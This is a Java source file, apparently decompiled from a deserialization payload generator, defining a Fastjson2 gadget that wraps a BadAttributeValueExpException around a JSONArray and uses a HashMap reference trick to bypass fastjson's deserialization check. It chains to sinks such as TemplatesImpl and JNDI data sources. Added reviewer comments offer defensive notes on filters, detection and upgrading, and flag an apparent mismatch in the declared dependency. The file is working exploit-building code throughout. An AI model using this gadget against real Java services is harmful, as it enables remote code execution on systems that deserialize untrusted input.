package com.ar3h.chains.gadget.impl.javanative.fastjson;

import com.alibaba.fastjson2.JSONArray;
import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.util.Reflections;
import java.util.HashMap;
import javax.management.BadAttributeValueExpException;
import org.apache.logging.log4j.core.jackson.JsonConstants;

/**
 * Gadget that wraps the object produced by the next chain element in the object graph
 * described by the annotation below.
 *
 * <p>In English, the annotation's description reads:
 * {@code BadAttributeValueExpException.readObject() => JSONArray.toString() => getter};
 * it adds that the HashMap reference mechanism is used to get past fastjson's
 * deserialization check.
 *
 * <p>Reviewer notes for defenders:
 * <ul>
 *   <li>The graph only has an effect when a target runs Java-native deserialization on
 *       attacker-supplied bytes. Avoid that entirely, or install an allow-list
 *       {@code java.io.ObjectInputFilter} that does not admit
 *       {@code javax.management.BadAttributeValueExpException} or
 *       {@code com.alibaba.fastjson2.*} from untrusted streams.</li>
 *   <li>A serialized stream that names both of those classes is a useful detection
 *       signal.</li>
 *   <li>The annotation declares the affected range as {@code <= 2.0.26}. Upgrading
 *       fastjson2 beyond that range is the dependency-side mitigation.</li>
 *   <li>NOTE(review): the annotation gives the coordinate as {@code com.alibaba:fastjson},
 *       while the code imports {@code com.alibaba.fastjson2.JSONArray}. Confirm which
 *       artifact is meant.</li>
 * </ul>
 */
@GadgetAnnotation(name = "Fastjson2反序列化链", description = "BadAttributeValueExpException.readObject() => JSONArray.toString() => getter，这里使用了Hashmap的引用机制绕过Fastjson反序列化的检测", dependencies = {"com.alibaba:fastjson <= 2.0.26"}, priority = 15)
@GadgetTags(tags = {Tag.JavaNativeDeserialize}, nextTags = {Tag.TemplatesImplChain, Tag.LdapAttributeChain, Tag.SignedObjectChain, Tag.MapMessageChain, Tag.C3p0JndiChain, Tag.DataSourceChains, Tag.DataSourceWrapperChain, "hutoolJndiDSFactory", "hutoolPooledDSFactory", "hutoolSimpleDSFactory"}, excludes = {Tag.NotForFastjson})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/fastjson/Fastjson2.class */
public class Fastjson2 implements Gadget {
    /**
     * Builds the map-rooted object graph around {@code obj}.
     *
     * @param obj the object supplied by the next chain element; it becomes both the single
     *            element of the JSONArray and the key of the returned map
     * @return a raw {@link HashMap} with one entry, {@code obj -> BadAttributeValueExpException}
     * @throws Exception propagated from the reflective field writes
     */
    public HashMap getObject(Object obj) throws Exception {
        // The exception is created with a null value; the real value is written into the
        // private field afterwards via reflection.
        BadAttributeValueExpException carrier = new BadAttributeValueExpException((Object) null);

        JSONArray wrapper = new JSONArray();
        wrapper.add(obj);
        Reflections.setFieldValue(carrier, "val", wrapper);

        // Reset the Throwable bookkeeping fields.
        // Presumably this keeps build-side stack frames out of the serialized form; confirm.
        Reflections.setFieldValue(carrier, "stackTrace", new StackTraceElement[0]);
        Reflections.setFieldValue(carrier, "suppressedExceptions", null);
        // NOTE(review): JsonConstants.ELT_CAUSE looks like a decompiler constant substitution
        // for the Throwable field name. It ties this class to log4j-core only for a string;
        // confirm against the original source.
        Reflections.setFieldValue(carrier, JsonConstants.ELT_CAUSE, null);

        // The same obj instance is the map key and the array element, so the graph holds
        // two references to it (the "reference mechanism" named in the annotation).
        HashMap root = new HashMap();
        root.put(obj, carrier);
        return root;
    }

    /**
     * Obtains the inner object from the rest of the chain, records it in the context, and
     * wraps it with {@link #getObject(Object)}.
     *
     * @param gadgetContext shared context; receives the inner object under
     *                      {@code ContextTag.FASTJSON_HANDLE_BYPASS_KEY}
     * @param gadgetChain   remaining chain, used to create the inner object
     * @return the map produced by {@link #getObject(Object)}
     * @throws Exception propagated from chain creation or graph construction
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        Object inner = gadgetChain.doCreate(gadgetContext);
        // The consumer of this key is not visible in this file.
        gadgetContext.put(ContextTag.FASTJSON_HANDLE_BYPASS_KEY, inner);
        return getObject(inner);
    }
}
